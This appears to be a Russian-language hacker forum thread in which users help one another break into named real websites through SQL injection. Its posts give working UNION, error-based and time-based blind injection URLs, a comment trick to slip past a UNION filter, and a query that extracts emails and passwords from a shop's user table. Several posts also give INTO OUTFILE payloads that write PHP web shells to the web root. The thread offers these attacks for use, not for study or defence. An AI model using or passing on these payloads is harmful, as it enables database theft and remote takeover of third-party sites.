UNION не работает кстати после ORDER BY. Единственное, что я вижу, что можно попробовать, это Code: INTO OUTFILE '/full/path/to/shell.php' LINES TERMINATED BY +'<?php @eval($_REQUEST[cmd]); ?>' Но опять же, FILE_PRIV = Y, magic_quotes_gpc = Off Можно подобрать еще количество колонок, но т.к. UNION работать не будет, то толку мало. Крутить как-то так: Code: , 100 UPD Code: SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=4, 1, 0)); SELECT user FROM mysql.user ORDER BY user, sleep(IF(substr(@@version, 1, 1)=5, 1, 0)); Ток если записей много, то лучше юзать LIMIT. Что-то по типу blind sleep-based sql injection
Как вывести версию БД, столкнулся с жесткой фильтрацией и обойти не получается? _http://1cnews.com/index.php?mode=search&sstring='and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'
Code: http://1cnews.com/index.php?mode=viewpart&part=-10+and+1=1+/*!uniON*/+select+1,version(),3--+f В title 5.1.33-log Вот так бро А то в поиске заморочки с LIKE. Вообщем все гениальное просто
Тут главное внимательность. http://1cnews.com/index.php?mode=viewpart&part=10 Делаем запрос: http://1cnews.com/index.php?mode=viewpart&part=10' В заголовке исчезает "Events of the branch". Что то тут не так Проверяем на inj. http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1 "Events of the branch" появился. А если: http://1cnews.com/index.php?mode=viewpart&part=10+and+1=2 Исчез. Соответственно, true и false. http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+10--+f Заголовок исчез. http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+order+by+3--+f Пояивлся, соответственно, кол-во 3. Ну а дальше http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+union+select+1,2,3--+f 403 forbidden Попробуем убрать union, все выводится, значит фильтрует union. Шифруем union => /*!uniON*/ Пробуем http://1cnews.com/index.php?mode=viewpart&part=10+and+1=1+/*!uniON*/+select+1,2,3--+f Заголовок есть, 10 заменяем на -10. В заголовке видим цифру 2. P.S. Вообщем контент-based injection
Сначала посмотри File_priv. Для этого: http://site.ltd/a.php?a=-1+union+select+1,user(),3--+f Копируем юзера. http://site.ltd/a.php?a=-1+union+select+1,file_priv,3+from+mysql.user+where+user='тут юзер'--+f Если выведет N, то залить не получится. Если Y + mq=off, то: http://site.ltd/a.php?a=-1+union+select+1,<?php tvoi_shell_kod ?>,3+into+outfile+'/path/to/www/dir/file.php'--+f После этого шелл будет по адресу site.ltd/dir/file.php
Ты про это наверно: PHP: select '<?php eval($_REQUEST[e]); ?>' into outfile '/path/to/www/dir/file.php'
народ, подобрал колонки, и проблема возникла из-за редиректа, как быть дальше? PHP: http://www.shop-stroitel.ru/catalog/?id=14+or+1=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
Вот так быть -> http://www.shop-stroitel.ru/catalog/?id=111114+or+1+group+by+concat%28%20%28select+user%28%29%29,floor%28rand%280%29*2%29%29%20having%20min%280%29--+ Называется ERROR BASED, TIME BASED - гугли по этим ключам
я так пробовал, когда начинаю выводить данне из таблицы PHP: http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+concat_ws(0x3a,email,password)+from+stroitel.acx_users+limit+$i,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+ возникает тотже редирект
Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл Code: www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
имею доступ к админке,могу редактировать индексную страницу, пытаюсь вставить туда: <?php assert(stripslashes($_REQUEST[a])); ?> но он появляется в соурсе: и соответственно index.php?a=phpinfo() не работает, что еще можно попробовать, подскажите пожалуйста товарищи хакеры
На будущее, если что то не выводится или перенаправляет, пробуй в Opere: Чтобы отключить авторедирект: Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Интернет(или Сеть, просто у меня EN Opera) => Сними галочку "Включить автоматическое перенаправление" Чтобы отключить Javascript: Открой уязвимый сайт => MOUSE2 => Настройки для сайта => Скрипты(Сценарий) => Сними галочку "Включить скрипты(Javascript)" В Firefox: Настройки => Дополнительно => Общие => "Предупреждать при попытке сайта перенаправить или перезагрузить страницу" Еще в твоем случаи mq=on, поэтому не получится через Error-based думаю, так как думаю, что нужно вставить кавычку, дабы вызвать ошибку. Возможно я и не прав. Это значит, что не выполняется php(впрочем везде так). Второй вопрос не подробный. Попробуй найти в админке файлменеджеры, аплоадеры и т.д.
Столкнулся с проблемой есть скуля &ordtype=name&ord=,sleep(IF(ASCII(substr((select+1+from+user),1,1))=123,1,0)) проблема в том что скрипт переводит таблицу user в верхний регистр USER и в итоге Invalid query: Table 'db.USER' doesn't exist пробывал &ordtype=тфьу&ord=,sleep(IF(ASCII(substr((set+@@global.lower_case_table_names=1),1,1))=123,1,0)) но ошибка Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET @@GLOBAL.LOWER_CASE_TABLE_NAMES=1),10,1))=48,1,0))' at line 9 как можно обойти перевод в верхний регистр или заставить поменять системную переменную? и еще раз тут есть вывод ошибок то наверное можно выводить через error-based но не выходит( upd: с error-based разобрадся. получилось Code: &ordtype=name&ord=,(select+1+from+information_schema.tables+group+by+concat((select+1),floor(rand(0)*2))+having+min(0)) , но так и не могу обойти перевод в верхний регистр(
он переводит имя таблицы в верхний регистр а не сам запрос т.е. select password from USER с unhex(hex(user)) такое не прокатит. вродебы где-то была метод с переводом всего запроса в mysql-hex и его выполнением в подзадпросе, но не могу найти(